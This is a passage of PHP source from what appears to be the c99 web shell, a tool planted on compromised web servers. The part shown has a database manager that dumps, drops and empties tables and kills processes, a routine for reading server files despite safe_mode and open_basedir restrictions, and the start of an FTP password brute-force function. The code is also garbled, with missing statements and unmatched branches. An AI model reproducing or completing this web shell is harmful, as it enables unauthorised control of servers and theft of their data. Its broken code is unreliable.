?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
if ($sql_server)
{
$sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
$err = mysql_smarterror();
@mysql_select_db($sql_db,$sql_sock);
if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
}
else {$sql_sock = FALSE;}
echo "<b>SQL Manager:</b><br>";
if (!$sql_sock)
{
if (!$sql_server) {echo "NO CONNECTION";}
else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
}
else
{
$sqlquicklaunch = array();
$sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
$sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
$sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
$sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
$sqlquicklaunch[] = array("Logout",$surl."act=sql");
echo "<center><b>MySQL
".mysql_get_server_info()." (proto v.
".mysql_get_proto_info ().") running in
".htmlspecialchars($sql_server).":
".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@
".htmlspecialchars($sql_server)." (password - \
"".
htmlspecialchars($sql_passwd).
"\")</b><br>";
if (count($sqlquicklaunch) >
0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".
$item[1].
"\"><b>".
$item[0].
"</b></a> ] ";
}}
}
if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td> <b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b> </td><td><b>Database</b> </td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
else
{
//Start left panel
{
?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
if (!
$result) {echo mysql_smarterror
();
}
else
{
$c = 0;
if (!
$c) {echo "No tables found in database.";
}
}
}
else
{
?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
if (!
$result) {echo mysql_smarterror
();
}
else
{
?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
$c = 0;
$dbs = "";
while ($row =
mysql_fetch_row($result)) {$dbs .=
"<option value=\"".
$row[0].
"\"";
if ($sql_db ==
$row[0]) {$dbs .=
" selected";
} $dbs .=
">".
$row[0].
"</option>";
$c++;
}
echo "<option value=\"\">Databases (".
$c.
")</option>";
}
?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
}
//End left panel
echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
//Start center panel
$diplay = TRUE;
if ($sql_db)
{
if ($c == 0) {$c = "no";}
echo "<hr size=\"1\" noshade><center><b>There are ".
$c.
" table(s) in this DB (".
htmlspecialchars($sql_db).
").<br>";
if (count($dbquicklaunch) >
0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".
$item[1].
"\">".
$item[0].
"</a> ] ";
}}
$acts =
array("",
"dump");
if ($sql_act ==
"tbldrop") {$sql_query =
"DROP TABLE";
foreach($boxtbl as $v) {$sql_query .=
"\n`".
$v.
"` ,";
} $sql_query =
substr($sql_query,
0,
-1).
";";
$sql_act =
"query";
}
elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
elseif ($sql_act ==
"tbldump") {if (count($boxtbl) >
0) {$dmptbls =
$boxtbl;
} elseif($thistbl) {$dmptbls =
array($sql_tbl);
} $sql_act =
"dump";
}
elseif ($sql_act ==
"tblcheck") {$sql_query =
"CHECK TABLE";
foreach($boxtbl as $v) {$sql_query .=
"\n`".
$v.
"` ,";
} $sql_query =
substr($sql_query,
0,
-1).
";";
$sql_act =
"query";
}
elseif ($sql_act ==
"tbloptimize") {$sql_query =
"OPTIMIZE TABLE";
foreach($boxtbl as $v) {$sql_query .=
"\n`".
$v.
"` ,";
} $sql_query =
substr($sql_query,
0,
-1).
";";
$sql_act =
"query";
}
elseif ($sql_act ==
"tblrepair") {$sql_query =
"REPAIR TABLE";
foreach($boxtbl as $v) {$sql_query .=
"\n`".
$v.
"` ,";
} $sql_query =
substr($sql_query,
0,
-1).
";";
$sql_act =
"query";
}
elseif ($sql_act ==
"tblanalyze") {$sql_query =
"ANALYZE TABLE";
foreach($boxtbl as $v) {$sql_query .=
"\n`".
$v.
"` ,";
} $sql_query =
substr($sql_query,
0,
-1).
";";
$sql_act =
"query";
}
elseif ($sql_act ==
"deleterow") {$sql_query =
"";
if (!
empty($boxrow_all)) {$sql_query =
"DELETE * FROM `".
$sql_tbl.
"`;";
} else {foreach($boxrow as $v) {$sql_query .=
"DELETE * FROM `".
$sql_tbl.
"` WHERE".
$v.
" LIMIT 1;\n";
} $sql_query =
substr($sql_query,
0,
-1);
} $sql_act =
"query";
}
elseif ($sql_tbl_act == "insert")
{
if ($sql_tbl_insert_radio == 1)
{
$keys = "";
foreach ($akeys as $v) {$keys .=
"`".
addslashes($v).
"`, ";
}
$values = "";
$i = 0;
foreach (array_values($sql_tbl_insert) as $v) {if ($funct =
$sql_tbl_insert_functs[$akeys[$i]]) {$values .=
$funct.
" (";
} $values .=
"'".
addslashes($v).
"'";
if ($funct) {$values .=
")";
} $values .=
", ";
$i++;
}
$sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
$sql_act = "query";
$sql_tbl_act = "browse";
}
elseif ($sql_tbl_insert_radio == 2)
{
$set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
$sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
$sql_act = "query";
$sql_tbl_act = "browse";
}
}
if ($sql_act == "query")
{
echo "<hr size=\"1\" noshade>";
if (($submit) and
(!
$sql_query_result) and
($sql_confirm)) {if (!
$sql_query_error) {$sql_query_error =
"Query was empty";
} echo "<b>Error:</b> <br>".
$sql_query_error.
"<br>";
}
if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
if ((!
$submit) or
($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".
$sql_surl.
"\" method=\"POST\"><b>";
if (($sql_query) and
(!
$submit)) {echo "Do you really want to:";
} else {echo "SQL-Query :";
} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".
htmlspecialchars($sql_query).
"</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".
htmlspecialchars($sql_tbl).
"\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".
htmlspecialchars($sql_goto).
"\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";
}
}
{
?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"> <input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
if ($sql_act == "newtbl")
{
}
else {echo "Can't create DB \"".
htmlspecialchars($sql_newdb).
"\".<br>Reason:</b> ".mysql_smarterror
();
}
}
elseif ($sql_act == "dump")
{
{
$diplay = FALSE;
echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".
htmlspecialchars($sql_db).
"\"><input type=\"hidden\" name=\"sql_login\" value=\"".
htmlspecialchars($sql_login).
"\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".
htmlspecialchars($sql_passwd).
"\"><input type=\"hidden\" name=\"sql_server\" value=\"".
htmlspecialchars($sql_server).
"\"><input type=\"hidden\" name=\"sql_port\" value=\"".
htmlspecialchars($sql_port).
"\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".
htmlspecialchars($sql_tbl).
"\"><b>SQL-Dump:</b><br><br>";
echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".
urlencode($sql_db).
"\"><br><br>";
$v =
join (";",
$dmptbls);
echo "<b>Only tables (explode \";\") <b><sup>1</sup></b>:</b> <input type=\"text\" name=\"dmptbls\" value=\"".
htmlspecialchars($v).
"\" size=\"".
(strlen($v)+5).
"\"><br><br>";
if ($dump_file) {$tmp = $dump_file;}
echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".
$tmp.
"\" size=\"".
(strlen($tmp)+
strlen($tmp) %
30).
"\"><br><br>";
echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
}
else
{
$diplay = TRUE;
$set["sock"] = $sql_sock;
$set["db"] = $sql_db;
$dump_out = "download";
$set["print"] = 0;
$set["nl2br"] = 0;
$set[""] = 0;
$set["file"] = $dump_file;
$set["add_drop"] = TRUE;
$set["onlytabs"] =
array();
if (!
empty($dmptbls)) {$set["onlytabs"] =
explode(";",
$dmptbls);
}
$ret = mysql_dump($set);
if ($sql_dump_download)
{
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=\"".
basename($sql_dump_file).
"\";");
}
elseif ($sql_dump_savetofile)
{
$fp =
fopen($sql_dump_file,
"w");
else
{
}
}
else {echo "<b>Dump: nothing to do!</b>";
}
}
}
if ($diplay)
{
{
if (empty($sql_tbl_act)) {$sql_tbl_act =
"browse";
}
$count =
mysql_query("SELECT COUNT(*) FROM `".
$sql_tbl.
"`;");
$tbl_struct_result =
mysql_query("SHOW FIELDS FROM `".
$sql_tbl.
"`;");
$tbl_struct_fields =
array();
if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
if (empty($sql_tbl_page)) {$sql_tbl_page =
0;
}
if (empty($sql_tbl_ls)) {$sql_tbl_ls =
0;
}
if (empty($sql_tbl_le)) {$sql_tbl_le =
30;
}
$perpage = $sql_tbl_le - $sql_tbl_ls;
$numpages = $count_row[0]/$perpage;
{
if ($e[0] == "d") {$asc_desc = "DESC";}
else {$asc_desc = "ASC";}
$v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
}
else {$v = "";}
$query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
echo "<a href=\"".
$sql_surl.
"sql_tbl=".
urlencode($sql_tbl).
"&sql_tbl_act=structure\">[ <b>Structure</b> ]</a> ";
echo "<a href=\"".
$sql_surl.
"sql_tbl=".
urlencode($sql_tbl).
"&sql_tbl_act=browse\">[ <b>Browse</b> ]</a> ";
echo "<a href=\"".
$sql_surl.
"sql_tbl=".
urlencode($sql_tbl).
"&sql_act=tbldump&thistbl=1\">[ <b>Dump</b> ]</a> ";
echo "<a href=\"".
$sql_surl.
"sql_tbl=".
urlencode($sql_tbl).
"&sql_tbl_act=insert\">[ <b>Insert</b> ]</a> ";
if ($sql_tbl_act ==
"structure") {echo "<br><br><b>Coming sooon!</b>";
}
if ($sql_tbl_act == "insert")
{
if (!
empty($sql_tbl_insert_radio))
{
}
else
{
echo "<br><br><b>Inserting row into table:</b><br>";
if (!
empty($sql_tbl_insert_q))
{
$sql_query = "SELECT * FROM `".$sql_tbl."`";
$sql_query .= " WHERE".$sql_tbl_insert_q;
$sql_query .= " LIMIT 1;";
$result =
mysql_query($sql_query,
$sql_sock) or
print("<br><br>".mysql_smarterror
());
}
else {$values =
array();
}
echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
foreach ($tbl_struct_fields as $field)
{
$name = $field["Field"];
if (empty($sql_tbl_insert_q)) {$v =
"";
}
echo "<tr><td><b>".
htmlspecialchars($name).
"</b></td><td>".
$field["Type"].
"</td><td><select name=\"sql_tbl_insert_functs[".
htmlspecialchars($name).
"]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".
htmlspecialchars($name).
"]\" value=\"".
htmlspecialchars($values[$name]).
"\" size=50></td></tr>";
$i++;
}
echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\"";
if (empty($sql_tbl_insert_q)) {echo " checked";
} echo "><b>Insert as new row</b>";
if (!
empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>";
echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".
htmlspecialchars($sql_tbl_insert_q).
"\">";
}
echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
}
}
if ($sql_tbl_act == "browse")
{
$sql_tbl_ls =
abs($sql_tbl_ls);
$sql_tbl_le =
abs($sql_tbl_le);
echo "<hr size=\"1\" noshade>";
echo "<img src=\"".
$surl.
"act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\"> ";
$b = 0;
for($i=0;$i<$numpages;$i++)
{
if (($i*
$perpage !=
$sql_tbl_ls) or
($i*
$perpage+
$perpage !=
$sql_tbl_le)) {echo "<a href=\"".
$sql_surl.
"sql_tbl=".
urlencode($sql_tbl).
"&sql_order=".
htmlspecialchars($sql_order).
"&sql_tbl_ls=".
($i*
$perpage).
"&sql_tbl_le=".
($i*
$perpage+
$perpage).
"\"><u>";
}
if (($i*
$perpage !=
$sql_tbl_ls) or
($i*
$perpage+
$perpage !=
$sql_tbl_le)) {echo "</u></a>";
}
if (($i/
30 ==
round($i/
30)) and
($i >
0)) {echo "<br>";
}
}
if ($i ==
0) {echo "empty";
}
echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".
htmlspecialchars($sql_db).
"\"><input type=\"hidden\" name=\"sql_login\" value=\"".
htmlspecialchars($sql_login).
"\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".
htmlspecialchars($sql_passwd).
"\"><input type=\"hidden\" name=\"sql_server\" value=\"".
htmlspecialchars($sql_server).
"\"><input type=\"hidden\" name=\"sql_port\" value=\"".
htmlspecialchars($sql_port).
"\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".
htmlspecialchars($sql_tbl).
"\"><input type=\"hidden\" name=\"sql_order\" value=\"".
htmlspecialchars($sql_order).
"\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".
$sql_tbl_ls.
"\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".
$sql_tbl_le.
"\"> <input type=\"submit\" value=\"View\"></form>";
echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
for ($i=0;$i<mysql_num_fields($result);$i++)
{
if ($e[0] == "a") {$s = "d"; $m = "asc";}
else {$s = "a"; $m = "desc";}
if (empty($e[0])) {$e[0] =
"a";
}
if ($e[1] !=
$v) {echo "<a href=\"".
$sql_surl.
"sql_tbl=".
$sql_tbl.
"&sql_tbl_le=".
$sql_tbl_le.
"&sql_tbl_ls=".
$sql_tbl_ls.
"&sql_order=".
$e[0].
"%20".
$v.
"\"><b>".
$v.
"</b></a>";
}
else {echo "<b>".
$v.
"</b><a href=\"".
$sql_surl.
"sql_tbl=".
$sql_tbl.
"&sql_tbl_le=".
$sql_tbl_le.
"&sql_tbl_ls=".
$sql_tbl_ls.
"&sql_order=".
$s.
"%20".
$v.
"\"><img src=\"".
$surl.
"act=img&img=sort_".
$m.
"\" height=\"9\" width=\"14\" alt=\"".
$m.
"\"></a>";
}
}
echo "<td><font color=\"green\"><b>Action</b></font></td>";
{
$w = "";
$i = 0;
echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".
$w.
"\"></td>";
$i = 0;
foreach ($row as $k=>$v)
{
if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
$i++;
}
echo "<a href=\"".
$sql_surl.
"sql_act=query&sql_tbl=".
urlencode($sql_tbl).
"&sql_tbl_ls=".
$sql_tbl_ls.
"&sql_tbl_le=".
$sql_tbl_le.
"&sql_query=".
urlencode("DELETE FROM `".
$sql_tbl.
"` WHERE".
$w.
" LIMIT 1;").
"\"><img src=\"".
$surl.
"act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a> ";
echo "<a href=\"".
$sql_surl.
"sql_tbl_act=insert&sql_tbl=".
urlencode($sql_tbl).
"&sql_tbl_ls=".
$sql_tbl_ls.
"&sql_tbl_le=".
$sql_tbl_le.
"&sql_tbl_insert_q=".
urlencode($w).
"\"><img src=\"".
$surl.
"act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a> ";
}
echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".
$surl.
"act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
echo "<option value=\"\">With selected:</option>";
echo "<option value=\"deleterow\">Delete</option>";
echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>";
}
}
else
{
if (!
$result) {echo mysql_smarterror
();
}
else
{
echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
$i = 0;
$tsize = $trows = 0;
{
$tsize += $row["Data_length"];
$trows += $row["Rows"];
$size = view_size($row["Data_length"]);
echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".
$row["Name"].
"\"></td>";
echo "<td> <a href=\"".
$sql_surl.
"sql_tbl=".
urlencode($row["Name"]).
"\"><b>".
$row["Name"].
"</b></a> </td>";
echo "<td>".
$row["Rows"].
"</td>";
echo "<td>".
$row["Type"].
"</td>";
echo "<td>".
$row["Create_time"].
"</td>";
echo "<td>".
$row["Update_time"].
"</td>";
echo "<td>".
$size.
"</td>";
echo "<td> <a href=\"".
$sql_surl.
"sql_act=query&sql_query=".
urlencode("DELETE FROM `".
$row["Name"].
"`").
"\"><img src=\"".
$surl.
"act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a> <a href=\"".
$sql_surl.
"sql_act=query&sql_query=".
urlencode("DROP TABLE `".
$row["Name"].
"`").
"\"><img src=\"".
$surl.
"act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a> <a href=\"".
$sql_surl.
"sql_tbl_act=insert&sql_tbl=".
$row["Name"].
"\"><img src=\"".
$surl.
"act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a> </td>";
$i++;
}
echo "<tr bgcolor=\"000000\">";
echo "<td><center><b>»</b></center></td>";
echo "<td><center><b>".
$i.
" table(s)</b></center></td>";
echo "<td><b>".
$trows.
"</b></td>";
echo "<td>".
$row[1].
"</td>";
echo "<td>".
$row[10].
"</td>";
echo "<td>".
$row[11].
"</td>";
echo "<td><b>".view_size
($tsize).
"</b></td>";
echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".
$surl.
"act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
echo "<option value=\"\">With selected:</option>";
echo "<option value=\"tbldrop\">Drop</option>";
echo "<option value=\"tblempty\">Empty</option>";
echo "<option value=\"tbldump\">Dump</option>";
echo "<option value=\"tblcheck\">Check table</option>";
echo "<option value=\"tbloptimize\">Optimize table</option>";
echo "<option value=\"tblrepair\">Repair table</option>";
echo "<option value=\"tblanalyze\">Analyze table</option>";
echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>";
}
}
}
}
}
else
{
$acts =
array("",
"newdb",
"serverstatus",
"servervars",
"processes",
"getfile");
if (in_array($sql_act,
$acts)) {?><table border=
"0" width=
"100%" height=
"1"><tr><td width=
"30%" height=
"1"><b>Create
new DB:</b><form action=
"<?php echo $surl; ?>"><input type=
"hidden" name=
"act" value=
"sql"><input type=
"hidden" name=
"sql_act" value=
"newdb"><input type=
"hidden" name=
"sql_login" value=
"<?php echo htmlspecialchars($sql_login); ?>"><input type=
"hidden" name=
"sql_passwd" value=
"<?php echo htmlspecialchars($sql_passwd); ?>"><input type=
"hidden" name=
"sql_server" value=
"<?php echo htmlspecialchars($sql_server); ?>"><input type=
"hidden" name=
"sql_port" value=
"<?php echo htmlspecialchars($sql_port); ?>"><input type=
"text" name=
"sql_newdb" size=
"20"> <input type=
"submit" value=
"Create"></form></td><td width=
"30%" height=
"1"><b>View
File:</b><form action=
"<?php echo $surl; ?>"><input type=
"hidden" name=
"act" value=
"sql"><input type=
"hidden" name=
"sql_act" value=
"getfile"><input type=
"hidden" name=
"sql_login" value=
"<?php echo htmlspecialchars($sql_login); ?>"><input type=
"hidden" name=
"sql_passwd" value=
"<?php echo htmlspecialchars($sql_passwd); ?>"><input type=
"hidden" name=
"sql_server" value=
"<?php echo htmlspecialchars($sql_server); ?>"><input type=
"hidden" name=
"sql_port" value=
"<?php echo htmlspecialchars($sql_port); ?>"><input type=
"text" name=
"sql_getfile" size=
"30" value=
"<?php echo htmlspecialchars($sql_getfile); ?>"> <input type=
"submit" value=
"Get"></form></td><td width=
"30%" height=
"1"></td></tr><tr><td width=
"30%" height=
"1"></td><td width=
"30%" height=
"1"></td><td width=
"30%" height=
"1"></td></tr></table><?php
}
{
echo "<hr size=\"1\" noshade>";
if ($sql_act == "newdb")
{
else {echo "Can't create DB \"".
htmlspecialchars($sql_newdb).
"\".<br>Reason:</b> ".mysql_smarterror
();
}
}
if ($sql_act == "serverstatus")
{
echo "<center><b>Server-status variables:</b><br><br>";
echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
while ($row =
mysql_fetch_array($result, MYSQL_NUM
)) {echo "<tr><td>".
$row[0].
"</td><td>".
$row[1].
"</td></tr>";
}
echo "</table></center>";
}
if ($sql_act == "servervars")
{
echo "<center><b>Server variables:</b><br><br>";
echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
while ($row =
mysql_fetch_array($result, MYSQL_NUM
)) {echo "<tr><td>".
$row[0].
"</td><td>".
$row[1].
"</td></tr>";
}
}
if ($sql_act == "processes")
{
if (!
empty($kill)) {$query =
"KILL ".
$kill.
";";
$result =
mysql_query($query,
$sql_sock);
echo "<b>Killing process #".
$kill.
"... ok. he is dead, amen.</b>";
}
echo "<center><b>Processes:</b><br><br>";
echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
while ($row =
mysql_fetch_array($result, MYSQL_NUM
)) { echo "<tr><td>".
$row[0].
"</td><td>".
$row[1].
"</td><td>".
$row[2].
"</td><td>".
$row[3].
"</td><td>".
$row[4].
"</td><td>".
$row[5].
"</td><td>".
$row[6].
"</td><td>".
$row[7].
"</td><td><a href=\"".
$sql_surl.
"sql_act=processes&kill=".
$row[0].
"\"><u>Kill</u></a></td></tr>";
}
}
if ($sql_act == "getfile")
{
$tmpdb = $sql_login."_tmpdb";
if ($select)
{
$created = FALSE;
mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
if (!
$result) {echo "<b>Error in reading file (permision denied)!</b>";
}
else
{
for ($i=
0;
$i<mysql_num_fields
($result);
$i++
) {$name =
mysql_field_name($result,
$i);
}
$f = "";
if (empty($f)) {echo "<b>File \"".
$sql_getfile.
"\" does not exists or empty!</b><br>";
}
}
}
mysql_drop_db($tmpdb);
//comment it if you want to leave database
}
}
}
}
echo "</td></tr></table>";
if ($sql_sock)
{
if ((!
is_numeric($affected)) or
($affected <
0)){$affected =
0;
}
echo "<tr><td><center><b>Affected rows: ".
$affected.
"</center></td></tr>";
}
}
if ($act == "mkdir")
{
if ($mkdir != $d)
{
}
$act = $dspact = "ls";
}
if ($act == "ftpquickbrute")
{
echo "<b>Ftp Quick brute:</b><br>";
if (!win
) {echo "This functions not work in Windows!<br><br>";
}
else
{
function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
{
if ($fqb_onlywithsh) {$TRUE =
(!
in_array($sh,
array("/bin/FALSE",
"/sbin/nologin")));
}
else {$TRUE = TRUE;}
if ($TRUE)
{
{
echo "<a href=\"ftp://".
$login.
":".
$pass.
"@".
$host.
